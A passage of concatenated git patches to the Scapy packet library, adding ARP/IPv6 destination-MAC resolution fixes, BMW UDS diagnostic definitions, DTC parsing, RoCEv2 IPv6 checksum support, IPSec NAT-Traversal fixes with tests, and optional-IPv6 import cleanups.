+= Test BitLenField +~ field + +SIZES = {0: 6, 1: 6, 2: 14, 3: 22} + +class TestBitLenField(Packet): + fields_desc = [ + BitField("mode", 0, 2), + BitLenField("value", 0, length_from=lambda pkt: SIZES[pkt.mode]) + ] + +p = TestBitLenField(mode=1, value=50) +assert bytes(p) == b"r" + +p = TestBitLenField(mode=2, value=5000) +assert bytes(p) == b'\x93\x88' +p = TestBitLenField(b'\xc0\x01\xf4') +assert p.mode == 3 +assert p.value == 500 ############ ############ From 35b47566e82253436ca0ae55ce5b7245bd14ffc7 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 10 Oct 2023 11:54:50 +0200 Subject: [PATCH 1103/1632] Fix L2 dst address computation (very intrusive) (#4145) * Less intrusive L2 dst computation (especially ARP) * Apply guedou suggestions --- scapy/layers/inet.py | 3 +++ scapy/layers/inet6.py | 3 +++ scapy/layers/l2.py | 47 ++++++++++++++++++++++++++------------ test/scapy/layers/inet.uts | 22 ++++++++++++++++++ 4 files changed, 61 insertions(+), 14 deletions(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index 8741b3bdad6..247a2905f48 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -1099,6 +1099,9 @@ def mysummary(self): def inet_register_l3(l2, l3): + """ + Resolves the default L2 destination address when IP is used. + """ return getmacbyip(l3.dst) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 0dbb19e0f14..d795bef446e 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -475,6 +475,9 @@ def dispatch_hook(cls, _pkt=None, *_, **kargs): def inet6_register_l3(l2, l3): + """ + Resolves the default L2 destination address when IPv6 is used. + """ return getmacbyip6(l3.dst) diff --git a/scapy/layers/l2.py b/scapy/layers/l2.py index 5ac5db7ce91..06ceccebb14 100644 --- a/scapy/layers/l2.py +++ b/scapy/layers/l2.py @@ -166,6 +166,12 @@ def __init__(self, name): def i2h(self, pkt, x): # type: (Optional[Packet], Optional[str]) -> str + if x is None and pkt is not None: + x = "None (resolved on build)" + return super(DestMACField, self).i2h(pkt, x) + + def i2m(self, pkt, x): + # type: (Optional[Packet], Optional[str]) -> bytes if x is None and pkt is not None: try: x = conf.neighbor.resolve(pkt, pkt.payload) @@ -176,12 +182,10 @@ def i2h(self, pkt, x): raise ScapyNoDstMacException() else: x = "ff:ff:ff:ff:ff:ff" - warning("Mac address to reach destination not found. Using broadcast.") # noqa: E501 - return super(DestMACField, self).i2h(pkt, x) - - def i2m(self, pkt, x): - # type: (Optional[Packet], Optional[str]) -> bytes - return super(DestMACField, self).i2m(pkt, self.i2h(pkt, x)) + warning( + "MAC address to reach destination not found. Using broadcast." + ) + return super(DestMACField, self).i2m(pkt, x) class SourceMACField(MACField): @@ -311,8 +315,10 @@ class LLC(Packet): ByteField("ctrl", 0)] -def l2_register_l3(l2, l3): - # type: (Packet, Packet) -> Optional[str] +def l2_register_l3(l2: Packet, l3: Packet) -> Optional[str]: + """ + Delegates resolving the default L2 destination address to the payload of L3. + """ neighbor = conf.neighbor # type: Neighbor return neighbor.resolve(l2, l3.payload) @@ -554,15 +560,28 @@ def mysummary(self): return self.sprintf("ARP %op% %psrc% > %pdst%") -def l2_register_l3_arp(l2, l3): - # type: (Packet, Packet) -> Optional[str] - # TODO: support IPv6? - plen = l3.plen if l3.plen is not None else l3.get_field("pdst").i2len(l3, l3.pdst) +def l2_register_l3_arp(l2: Packet, l3: Packet) -> Optional[str]: + """ + Resolves the default L2 destination address when ARP is used. + """ + if l3.op == 1: # who-has + return "ff:ff:ff:ff:ff:ff" + elif l3.op == 2: # is-at + log_runtime.warning( + "You should be providing the Ethernet destination MAC address when " + "sending an is-at ARP." + ) + # Need ARP request to send ARP request... + plen = l3.get_field("pdst").i2len(l3, l3.pdst) if plen == 4: return getmacbyip(l3.pdst) + elif plen == 32: + from scapy.layers.inet6 import getmacbyip6 + return getmacbyip6(l3.pdst) + # Can't even do that log_runtime.warning( - "Unable to guess L2 MAC address from an ARP packet with a " - "non-IPv4 pdst. Provide it manually !" + "You should be providing the Ethernet destination mac when sending this " + "kind of ARP packets." ) return None diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index e767afcbad9..5b98c1c74f3 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -572,6 +572,28 @@ assert isinstance(pkt, UDP) and pkt.dport == 5353 pkt = pkt.payload assert isinstance(pkt, DNS) and isinstance(pkt.payload, NoPayload) += Layer binding with show() +* getmacbyip must only be called when building + +import mock + +def _err(*_): + raise ValueError + +with mock.patch("scapy.layers.l2.getmacbyip", side_effect=_err): + with mock.patch("scapy.layers.inet.getmacbyip", side_effect=_err): + # ARP who-has should never call getmacbyip + pkt1 = Ether() / ARP(pdst="10.0.0.1") + pkt1.show() + bytes(pkt1) + # IP should only call getmacbyip when building + pkt2 = Ether() / IP(dst="10.0.0.1") + pkt2.show() + try: + bytes(pkt2) + assert False, "Should have called getmacbyip" + except ValueError: + pass ############ ############ From e3074451823394e3bb750a1a810dc880e7ea7082 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 10 Oct 2023 15:05:37 +0200 Subject: [PATCH 1104/1632] Add more BMW software version definitions (#4143) * Add more BMW software version definitions * fix codespell * add englisch translation --- .config/codespell_ignore.txt | 5 +- scapy/contrib/automotive/bmw/definitions.py | 67 ++++++++++++++++++--- 2 files changed, 61 insertions(+), 11 deletions(-) diff --git a/.config/codespell_ignore.txt b/.config/codespell_ignore.txt index 6405c1d1111..f425573c7ee 100644 --- a/.config/codespell_ignore.txt +++ b/.config/codespell_ignore.txt @@ -1,6 +1,7 @@ aci ans archtypes +applikation ba byteorder cace @@ -11,12 +12,13 @@ delt doas doubleclick ether -ether eventtypes fo +funktion gost hart iff +interaktive inout microsof mitre @@ -32,6 +34,7 @@ ser singl slac te +temporaere tim ue uint diff --git a/scapy/contrib/automotive/bmw/definitions.py b/scapy/contrib/automotive/bmw/definitions.py index aa11be6209d..143827a5c38 100644 --- a/scapy/contrib/automotive/bmw/definitions.py +++ b/scapy/contrib/automotive/bmw/definitions.py @@ -15,7 +15,6 @@ from scapy.contrib.automotive.uds import UDS, UDS_RDBI, UDS_DSC, UDS_IOCBI, \ UDS_RC, UDS_RD, UDS_RSDBI, UDS_RDBIPR - BMW_specific_enum = { 0: "requestIdentifiedBCDDTCAndStatus", 1: "requestSupportedBCDDTCAndStatus", @@ -252,10 +251,60 @@ def i2repr(self, pkt, x): class SVK_Entry(Packet): + process_classes = { + "0x01": "HWEL", + "0x02": "HWAP", + "0x03": "HWFR", + "0x05": "CAFD", + "0x06": "BTLD", + "0x08": "SWFL", + "0x09": "SWFF", + "0x0A": "SWPF", + "0x0B": "ONPS", + "0x0F": "FAFP", + "0x1A": "TLRT", + "0x1B": "TPRG", + "0x07": "FLSL", + "0x0C": "IBAD", + "0x10": "FCFA", + "0x1C": "BLUP", + "0x1D": "FLUP", + "0xC0": "SWUP", + "0xC1": "SWIP", + "0xA0": "ENTD", + "0xA1": "NAVD", + "0xA2": "FCFN", + "0x04": "GWTB", + "0x0D": "SWFK", + } + """ + HWEL - Hardware (Elektronik) - Hardware (Electronics) + HWAP - Hardwareauspraegung - Hardware Configuration + HWFR - Hardwarefarbe - Hardware Color + CAFD - Codierdaten - Coding Data + BTLD - Bootloader - Bootloader + SWFL - Software ECU Speicherimage - Software ECU Storage Image + SWFF - Flash File Software - Flash File Software + SWPF - Pruefsoftware - Testing Software + ONPS - Onboard Programmiersystem - Onboard Programming System + FAFP - FA2FP - FA2FP + TLRT - Temporaere Loeschroutine - Temporary Deletion Routine + TPRG - Temporaere Programmierroutine - Temporary Programming Routine + FLSL - Flashloader Slave - Flashloader Slave + IBAD - Interaktive Betriebsanleitung Daten - Interactive Operating Manual Data + FCFA - Freischaltcode Fahrzeug-Auftrag - Vehicle Order Unlock Code + BLUP - Bootloader-Update Applikation - Bootloader Update Application + FLUP - Flashloader-Update Applikation - Flashloader Update Application + SWUP - Software-Update Package - Software Update Package + SWIP - Index Software-Update Package - Software Update Package Index + ENTD - Entertainment Daten - Entertainment Data + NAVD - Navigation Daten - Navigation Data + FCFN - Freischaltcode Funktion - Function Unlock Code + GWTB - Gateway-Tabelle - Gateway Table + SWFK - BEGU: Detaillierung auf SWE-Ebene - BEGU: Detailing at SWE Level + """ fields_desc = [ - ByteEnumField("processClass", 0, {1: "HWEL", 2: "HWAP", 4: "GWTB", - 5: "CAFD", 6: "BTLD", 7: "FLSL", - 8: "SWFL"}), + ByteEnumField("processClass", 0, process_classes), XStrFixedLenField("svk_id", b"", length=4), ByteField("mainVersion", 0), ByteField("subVersion", 0), @@ -372,7 +421,6 @@ class WEBSERVER(Packet): bind_layers(DEV_JOB, READ_MEM, identifier=0xffff) bind_layers(DEV_JOB_PR, READ_MEM_PR, identifier=0xffff) - bind_layers(UDS_RDBIPR, SVK, dataIdentifier=0xf101) bind_layers(UDS_RDBIPR, SVK, dataIdentifier=0xf102) bind_layers(UDS_RDBIPR, SVK, dataIdentifier=0xf103) @@ -438,7 +486,6 @@ class WEBSERVER(Packet): bind_layers(UDS_RDBIPR, SVK, dataIdentifier=0xf13f) bind_layers(UDS_RDBIPR, SVK, dataIdentifier=0xf140) - UDS_RDBI.dataIdentifiers[0x0014] = "RDBCI_IS_LESEN_DETAIL_REQ" UDS_RDBI.dataIdentifiers[0x0015] = "RDBCI_HS_LESEN_DETAIL_REQ" UDS_RDBI.dataIdentifiers[0x0e80] = "AirbagLock" @@ -1505,7 +1552,7 @@ class WEBSERVER(Packet): UDS_RDBI.dataIdentifiers[0x22fd] = "afterSalesServiceData_2200_22FF" UDS_RDBI.dataIdentifiers[0x22fe] = "afterSalesServiceData_2200_22FF" UDS_RDBI.dataIdentifiers[0x22ff] = "afterSalesServiceData_2200_22FF" -UDS_RDBI.dataIdentifiers[0x2300] = "operatingData" # or RDBCI_BETRIEBSDATEN_LESEN_REQ # noqa E501 +UDS_RDBI.dataIdentifiers[0x2300] = "operatingData" # or RDBCI_BETRIEBSDATEN_LESEN_REQ # noqa E501 UDS_RDBI.dataIdentifiers[0x2301] = "additionalOperatingData 2301-23FF" UDS_RDBI.dataIdentifiers[0x2302] = "additionalOperatingData 2301-23FF" UDS_RDBI.dataIdentifiers[0x2303] = "additionalOperatingData 2301-23FF" @@ -1831,13 +1878,13 @@ class WEBSERVER(Packet): UDS_RDBI.dataIdentifiers[0x2503] = "ProgrammingCounterMax" UDS_RDBI.dataIdentifiers[0x2504] = "FlashTimings" UDS_RDBI.dataIdentifiers[0x2505] = "MaxBlocklength" -UDS_RDBI.dataIdentifiers[0x2506] = "ReadMemoryAddress" # or maximaleBlockLaenge # noqa E501 +UDS_RDBI.dataIdentifiers[0x2506] = "ReadMemoryAddress" # or maximaleBlockLaenge # noqa E501 UDS_RDBI.dataIdentifiers[0x2507] = "EcuSupportsDeleteSwe" UDS_RDBI.dataIdentifiers[0x2508] = "GWRoutingStatus" UDS_RDBI.dataIdentifiers[0x2509] = "RoutingTable" UDS_RDBI.dataIdentifiers[0x2530] = "SubnetStatus" UDS_RDBI.dataIdentifiers[0x2541] = "STATUS_CALCVN" -UDS_RDBI.dataIdentifiers[0x3000] = "RDBI_CD_REQ" # or WDBI_CD_REQ +UDS_RDBI.dataIdentifiers[0x3000] = "RDBI_CD_REQ" # or WDBI_CD_REQ UDS_RDBI.dataIdentifiers[0x300a] = "Codier-VIN" UDS_RDBI.dataIdentifiers[0x37fe] = "Codierpruefstempel" UDS_RDBI.dataIdentifiers[0x3f00] = "SVT-Ist" @@ -4864,7 +4911,7 @@ class WEBSERVER(Packet): UDS_RC.routineControlIdentifiers[0x0f09] = "checkSignature" UDS_RC.routineControlIdentifiers[0x0f0a] = "checkProgrammingStatus" UDS_RC.routineControlIdentifiers[0x0f0b] = "ExecuteDiagnosticService" -UDS_RC.routineControlIdentifiers[0x0f0c] = "SetEnergyMode" # or controlEnergySavingMode # noqa E501 +UDS_RC.routineControlIdentifiers[0x0f0c] = "SetEnergyMode" # or controlEnergySavingMode # noqa E501 UDS_RC.routineControlIdentifiers[0x0f0d] = "resetSystemFaultMessage" UDS_RC.routineControlIdentifiers[0x0f0e] = "timeControlledPowerDown" UDS_RC.routineControlIdentifiers[0x0f0f] = "disableCommunicationOverGateway" From 2a4c4ae25e267c34129ba091a2b411aafdaebcfd Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 11 Oct 2023 12:08:19 +0200 Subject: [PATCH 1105/1632] Add parsing of ExtendedDataRecord to UDS_DTCs (#4117) * Add UDS_DTC parsing for ExtendedDataRecords * add dict for DTC descriptions --- scapy/contrib/automotive/uds.py | 34 ++++++++++++++++++++++++++++----- 1 file changed, 29 insertions(+), 5 deletions(-) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 8b0dcf6f18f..bbe0316144c 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -1013,6 +1013,8 @@ class UDS_RDTCI(Packet): class DTC(Packet): name = 'Diagnostic Trouble Code' + dtc_descriptions = {} # Customize this dictionary for each individual ECU / OEM + fields_desc = [ BitEnumField("system", 0, 2, { 0: "Powertrain", @@ -1032,7 +1034,7 @@ def extract_padding(self, s): return '', s -class DTC_Status(Packet): +class DTCAndStatusRecord(Packet): name = 'DTC and status record' fields_desc = [ PacketField("dtc", None, pkt_cls=DTC), @@ -1043,6 +1045,26 @@ def extract_padding(self, s): return '', s +class DTCExtendedData(Packet): + name = 'Diagnostic Trouble Code Extended Data' + dataTypes = ObservableDict() + + fields_desc = [ + ByteEnumField("data_type", 0, dataTypes), + XByteField("record", 0) + ] + + def extract_padding(self, s): + return '', s + + +class DTCExtendedDataRecord(Packet): + fields_desc = [ + PacketField("dtcAndStatus", None, pkt_cls=DTCAndStatusRecord), + PacketListField("extendedData", None, pkt_cls=DTCExtendedData) + ] + + class UDS_RDTCIPR(Packet): name = 'ReadDTCInformationPositiveResponse' fields_desc = [ @@ -1063,14 +1085,16 @@ class UDS_RDTCIPR(Packet): lambda pkt: pkt.reportType in [0x01, 0x07, 0x11, 0x12]), ConditionalField(PacketListField('DTCAndStatusRecord', None, - pkt_cls=DTC_Status), + pkt_cls=DTCAndStatusRecord), lambda pkt: pkt.reportType in [0x02, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x13, 0x15]), ConditionalField(StrField('dataRecord', b""), - lambda pkt: pkt.reportType in [0x03, 0x04, 0x05, - 0x06, 0x08, 0x09, - 0x10, 0x14]) + lambda pkt: pkt.reportType in [0x03, 0x08, 0x09, + 0x10, 0x14]), + ConditionalField(PacketField('extendedDataRecord', None, + pkt_cls=DTCExtendedDataRecord), + lambda pkt: pkt.reportType in [0x06]) ] def answers(self, other): From 4fefbb09a232b753a08e63cd1c805414011e18e7 Mon Sep 17 00:00:00 2001 From: leonidokner <88691968+leonidokner@users.noreply.github.com> Date: Thu, 19 Oct 2023 23:30:55 -0700 Subject: [PATCH 1106/1632] Added logic to compute ICRC for RoCEv2 over IPv6 (#4154) * Added logic to compute ICRC for RoCEv2 over IPv6. * Fixed RoCEv2 icrc computation. --------- Co-authored-by: leonidokner --- scapy/contrib/roce.py | 20 +++++++++++++++++++- test/contrib/roce.uts | 21 +++++++++++++++++++++ 2 files changed, 40 insertions(+), 1 deletion(-) diff --git a/scapy/contrib/roce.py b/scapy/contrib/roce.py index 9a6683cefa1..93dceab693b 100644 --- a/scapy/contrib/roce.py +++ b/scapy/contrib/roce.py @@ -14,6 +14,7 @@ from scapy.fields import ByteEnumField, ByteField, XByteField, \ ShortField, XShortField, XLongField, BitField, XBitField, FCSField from scapy.layers.inet import IP, UDP +from scapy.layers.inet6 import IPv6 from scapy.layers.l2 import Ether from scapy.compat import raw from scapy.error import warning @@ -179,8 +180,25 @@ def compute_icrc(self, p): pshdr[UDP].payload = Raw(bth + payload + icrc_placeholder) icrc = crc32(raw(pshdr)[:-4]) & 0xffffffff return self.pack_icrc(icrc) + elif isinstance(ip, IPv6): + # pseudo-LRH / IPv6 / UDP / BTH / payload + pshdr = Raw(b'\xff' * 8) / ip.copy() + pshdr.hlim = 0xff + pshdr.fl = 0xfffff + pshdr.tc = 0xff + pshdr[UDP].chksum = 0xffff + pshdr[BTH].fecn = 1 + pshdr[BTH].becn = 1 + pshdr[BTH].resv6 = 0xff + bth = pshdr[BTH].self_build() + payload = raw(pshdr[BTH].payload) + # add ICRC placeholder just to get the right IPv6.plen and + # UDP.length + icrc_placeholder = b'\xff\xff\xff\xff' + pshdr[UDP].payload = Raw(bth + payload + icrc_placeholder) + icrc = crc32(raw(pshdr)[:-4]) & 0xffffffff + return self.pack_icrc(icrc) else: - # TODO support IPv6 warning("The underlayer protocol %s is not supported.", ip and ip.name) return self.pack_icrc(0) diff --git a/test/contrib/roce.uts b/test/contrib/roce.uts index 757163d3049..ff19affec3c 100644 --- a/test/contrib/roce.uts +++ b/test/contrib/roce.uts @@ -124,3 +124,24 @@ assert not pkt[BTH].ackreq assert pkt[AETH].syndrome == 0 assert pkt[AETH].msn == 5 assert pkt.icrc == 0x25f0c038 + += RoCE over IPv6 + +# an example UC packet +pkt = Ether(dst='24:8a:07:a8:fa:22', src='24:8a:07:a8:fa:22')/ \ + IPv6(nh=17,src='2022::1023', dst='2023::1024', \ + version=6,hlim=255,plen=44,fl=0x1face,tc=226)/ \ + UDP(sport=49152, dport=4791, len=44)/ \ + BTH(opcode='UC_SEND_ONLY', migreq=1, padcount=2, pkey=0xffff, dqpn=211, psn=13571856)/ \ + Raw(b'F0\x81\x8b\xe2\x895\xd9\x0e\x9a\x95PT\x01\xbe\x88^P\x00\x00') + +# include ICRC placeholder +pkt = Ether(pkt.build() + b'\x00' * 4) + +assert IPv6 in pkt.layers() +assert UDP in pkt.layers() +print(hex(pkt[UDP].chksum)) +assert pkt[UDP].chksum == 0xe7c5 +assert BTH in pkt.layers() +print(hex(pkt[BTH].icrc)) +assert pkt[BTH].icrc == 0x3e5b743b From 9ca3cc9646036f4cf562e7fd274d3edf17575957 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Pawe=C5=82=20Pachocki?= <101826859+ppachocki@users.noreply.github.com> Date: Mon, 23 Oct 2023 22:42:51 +0200 Subject: [PATCH 1107/1632] Fix UDP header in IPSec NAT-Traversal. (#4125) * Fix UDP header in IPSec NAT-Traversal. * Added tests for IPSec NAT-Traversal. --- scapy/layers/ipsec.py | 7 ++-- test/scapy/layers/ipsec.uts | 83 +++++++++++++++++++++++++++++++++++++ 2 files changed, 86 insertions(+), 4 deletions(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index ecdc14af960..fbf3b173862 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -1046,17 +1046,16 @@ def _encrypt_esp(self, pkt, seq_num=None, iv=None, esn_en=None, esn=None): ip_header /= nat_t_header if ip_header.version == 4: - ip_header.len = len(ip_header) + len(esp) + del ip_header.len del ip_header.chksum - ip_header = ip_header.__class__(raw(ip_header)) else: - ip_header.plen = len(ip_header.payload) + len(esp) + del ip_header.plen # sequence number must always change, unless specified by the user if seq_num is None: self.seq_num += 1 - return ip_header / esp + return ip_header.__class__(raw(ip_header / esp)) def _encrypt_ah(self, pkt, seq_num=None, esn_en=False, esn=0): diff --git a/test/scapy/layers/ipsec.uts b/test/scapy/layers/ipsec.uts index 39697a40eca..eedac7bc6bd 100644 --- a/test/scapy/layers/ipsec.uts +++ b/test/scapy/layers/ipsec.uts @@ -3277,6 +3277,89 @@ try: except IPSecIntegrityError as err: err +############################################################################### ++ IPv4 / UDP / ESP - NAT-Traversal + +####################################### += IPv4 / UDP / ESP - NAT-Traversal - Tunnel +~ -crypto + +p = IP(src='1.1.1.1', dst='2.2.2.2') +p /= TCP(sport=45012, dport=80) +p /= Raw('testdata') +p = IP(raw(p)) +p + +sa = SecurityAssociation(ESP, spi=0x222, + crypt_algo='NULL', crypt_key=None, + auth_algo='NULL', auth_key=None, + tunnel_header=IP(src='11.11.11.11', dst='22.22.22.22'), + nat_t_header=UDP(dport=5000)) + +e = sa.encrypt(p) +e + +assert isinstance(e, IP) +* after encryption packet should be encapsulated with the given ip tunnel header +assert e.src == '11.11.11.11' and e.dst == '22.22.22.22' +assert e.chksum != p.chksum +* the encrypted packet should have an UDP layer +assert e.proto == socket.IPPROTO_UDP +assert e.haslayer(UDP) +assert e[UDP].sport == 4500 +assert e[UDP].dport == 5000 +assert e[UDP].chksum == 0 +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data + +d = sa.decrypt(e) +d + +* after decryption the original packet payload should be unaltered +assert d[TCP] == p[TCP] + +####################################### += IPv4 / UDP / ESP - NAT-Traversal - Transport +~ -crypto + +import socket + +p = IP(src='1.1.1.1', dst='2.2.2.2') +p /= TCP(sport=45012, dport=80) +p /= Raw('testdata') +p = IP(raw(p)) +p + +sa = SecurityAssociation(ESP, spi=0x222, + crypt_algo='NULL', crypt_key=None, + auth_algo='NULL', auth_key=None, + nat_t_header=UDP(dport=5000)) + +e = sa.encrypt(p) +e + +assert isinstance(e, IP) +assert e.src == '1.1.1.1' and e.dst == '2.2.2.2' +assert e.chksum != p.chksum +* the encrypted packet should have an UDP layer +assert e.proto == socket.IPPROTO_UDP +assert e.haslayer(UDP) +assert e[UDP].sport == 4500 +assert e[UDP].dport == 5000 +assert e[UDP].chksum == 0 +assert e.haslayer(ESP) +assert not e.haslayer(TCP) +assert e[ESP].spi == sa.spi +assert b'testdata' in e[ESP].data + +d = sa.decrypt(e) +d + +* after decryption the original packet payload should be unaltered +assert d[TCP] == p[TCP] + ############################################################################### + IPv6 / ESP From f9113dc5ce5bea1d748a9f35904c82b70ec93d64 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 12 Sep 2023 13:50:48 +0200 Subject: [PATCH 1108/1632] Minor cleanup and add utility function for Automotive Scanner --- scapy/contrib/automotive/scanner/executor.py | 7 +++++++ scapy/contrib/isotp/isotp_soft_socket.py | 18 ++++++++++-------- 2 files changed, 17 insertions(+), 8 deletions(-) diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 196a88b6002..5150c285ce7 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -33,8 +33,11 @@ Callable, Type, cast, + TypeVar, ) +T = TypeVar("T") + class AutomotiveTestCaseExecutor(metaclass=abc.ABCMeta): """ @@ -415,6 +418,10 @@ def show_testcases_status(self): data += [(repr(s), t.__class__.__name__, t.has_completed(s))] make_lined_table(data, lambda *tup: (tup[0], tup[1], tup[2])) + def get_test_cases_by_class(self, cls): + # type: (Type[T]) -> List[T] + return [x for x in self.configuration.test_cases if isinstance(x, cls)] + @property def supported_responses(self): # type: () -> List[EcuResponse] diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 96411c41908..3b8dc7f80ce 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -228,6 +228,8 @@ class TimeoutScheduler: # use heapq functions on _handles! _handles = [] # type: List[TimeoutScheduler.Handle] + logger = logging.getLogger("scapy.contrib.automotive.timeout_scheduler") + @classmethod def schedule(cls, timeout, callback): # type: (float, Callable[[], None]) -> TimeoutScheduler.Handle @@ -316,13 +318,13 @@ def _wait(cls, handle): # Wait until the next timeout, # or until event.set() gets called in another thread. if to_wait > 0: - log_isotp.debug("TimeoutScheduler Thread going to sleep @ %f " + - "for %fs", now, to_wait) + cls.logger.debug("Thread going to sleep @ %f " + + "for %fs", now, to_wait) interrupted = cls._event.wait(to_wait) new = cls._time() - log_isotp.debug("TimeoutScheduler Thread awake @ %f, slept for" + - " %f, interrupted=%d", new, new - now, - interrupted) + cls.logger.debug("Thread awake @ %f, slept for" + + " %f, interrupted=%d", new, new - now, + interrupted) # Clear the event so that we can wait on it again, # Must be done before doing the callbacks to avoid losing a set(). @@ -335,7 +337,7 @@ def _task(cls): start when the first timeout is added and stop when the last timeout is removed or executed.""" - log_isotp.debug("TimeoutScheduler Thread spawning @ %f", cls._time()) + cls.logger.debug("Thread spawning @ %f", cls._time()) time_empty = None @@ -357,7 +359,7 @@ def _task(cls): finally: # Worst case scenario: if this thread dies, the next scheduled # timeout will start a new one - log_isotp.debug("TimeoutScheduler Thread died @ %f", cls._time()) + cls.logger.debug("Thread died @ %f", cls._time()) cls._thread = None @classmethod @@ -379,7 +381,7 @@ def _poll(cls): callback = handle._cb handle._cb = True - # Call the callback here, outside of the mutex + # Call the callback here, outside the mutex if callable(callback): try: callback() From d54a4578d7610265f4a97e0e1312d9c676f4604e Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 22 Oct 2023 21:23:26 +0200 Subject: [PATCH 1109/1632] Support stupid OSes --- scapy/config.py | 2 +- scapy/layers/dns.py | 32 +++++++--- scapy/layers/hsrp.py | 6 +- scapy/layers/ntp.py | 2 +- scapy/main.py | 145 +++++++++++++++++++++++-------------------- scapy/pton_ntop.py | 4 ++ scapy/utils.py | 5 +- 7 files changed, 117 insertions(+), 79 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index 7c4215998ff..7b03d9debfe 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -952,7 +952,7 @@ def __getattribute__(self, attr): if not Conf.ipv6_enabled: log_scapy.warning("IPv6 support disabled in Python. Cannot load Scapy IPv6 layers.") # noqa: E501 - for m in ["inet6", "dhcp6"]: + for m in ["inet6", "dhcp6", "sixlowpan"]: if m in Conf.load_layers: Conf.load_layers.remove(m) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 80634759bac..6bed0be230c 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -26,18 +26,32 @@ from scapy.compat import orb, raw, chb, bytes_encode, plain_str from scapy.error import log_runtime, warning, Scapy_Exception from scapy.packet import Packet, bind_layers, Raw -from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - ConditionalField, Field, FieldLenField, FlagsField, IntField, \ - PacketListField, ShortEnumField, ShortField, StrField, \ - StrLenField, MultipleTypeField, UTCTimeField, I +from scapy.fields import ( + BitEnumField, + BitField, + ByteEnumField, + ByteField, + ConditionalField, + Field, + FieldLenField, + FlagsField, + I, + IP6Field, + IntField, + MultipleTypeField, + PacketListField, + ShortEnumField, + ShortField, + StrField, + StrLenField, + UTCTimeField, +) from scapy.sendrecv import sr1 from scapy.supersocket import StreamSocket from scapy.pton_ntop import inet_ntop, inet_pton from scapy.volatile import RandShort from scapy.layers.inet import IP, DestIPField, IPField, UDP, TCP -from scapy.layers.inet6 import IPv6, DestIP6Field, IP6Field - from typing import ( Any, @@ -1103,7 +1117,9 @@ def pre_dissect(self, s): bind_layers(UDP, DNS, dport=53) bind_layers(UDP, DNS, sport=53) DestIPField.bind_addr(UDP, "224.0.0.251", dport=5353) -DestIP6Field.bind_addr(UDP, "ff02::fb", dport=5353) +if conf.ipv6_enabled: + from scapy.layers.inet6 import DestIP6Field + DestIP6Field.bind_addr(UDP, "ff02::fb", dport=5353) bind_layers(TCP, DNS, dport=53) bind_layers(TCP, DNS, sport=53) @@ -1135,6 +1151,7 @@ def dns_resolve(qname, qtype="A", raw=False, verbose=1, **kwargs): kwargs.setdefault("timeout", 3) kwargs.setdefault("verbose", 0) + res = None for nameserver in conf.nameservers: # Try all nameservers try: @@ -1310,6 +1327,7 @@ def is_request(self, req): ) def make_reply(self, req): + from scapy.layers.inet6 import IPv6 if IPv6 in req: resp = IPv6(dst=req[IPv6].src, src=self.src_ip6) else: diff --git a/scapy/layers/hsrp.py b/scapy/layers/hsrp.py index ca0868f927e..ad9554382f9 100644 --- a/scapy/layers/hsrp.py +++ b/scapy/layers/hsrp.py @@ -12,11 +12,11 @@ http://www.smartnetworks.jp/2006/02/hsrp_8_hsrp_version_2.html """ +from scapy.config import conf from scapy.fields import ByteEnumField, ByteField, IPField, SourceIPField, \ StrFixedLenField, XIntField, XShortField from scapy.packet import Packet, bind_layers, bind_bottom_up from scapy.layers.inet import DestIPField, UDP -from scapy.layers.inet6 import DestIP6Field class HSRP(Packet): @@ -66,4 +66,6 @@ def post_build(self, p, pay): bind_layers(UDP, HSRP, dport=1985, sport=1985) bind_layers(UDP, HSRP, dport=2029, sport=2029) DestIPField.bind_addr(UDP, "224.0.0.2", dport=1985) -DestIP6Field.bind_addr(UDP, "ff02::66", dport=2029) +if conf.ipv6_enabled: + from scapy.layers.inet6 import DestIP6Field + DestIP6Field.bind_addr(UDP, "ff02::66", dport=2029) diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index 57d155e9af9..51eb4b1002b 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -22,6 +22,7 @@ FieldListField, FixedPointField, FlagsField, + IP6Field, IPField, IntField, LEIntField, @@ -39,7 +40,6 @@ XByteField, XStrFixedLenField, ) -from scapy.layers.inet6 import IP6Field from scapy.layers.inet import UDP from scapy.utils import lhex from scapy.compat import orb diff --git a/scapy/main.py b/scapy/main.py index 464e125e965..254da828918 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -561,6 +561,84 @@ def _len(line): return lines +def get_fancy_banner(mini: Optional[bool] = None) -> str: + """ + Generates the fancy Scapy banner + + :param mini: if set, force a mini banner or not. Otherwise detect + """ + from scapy.config import conf + from scapy.utils import 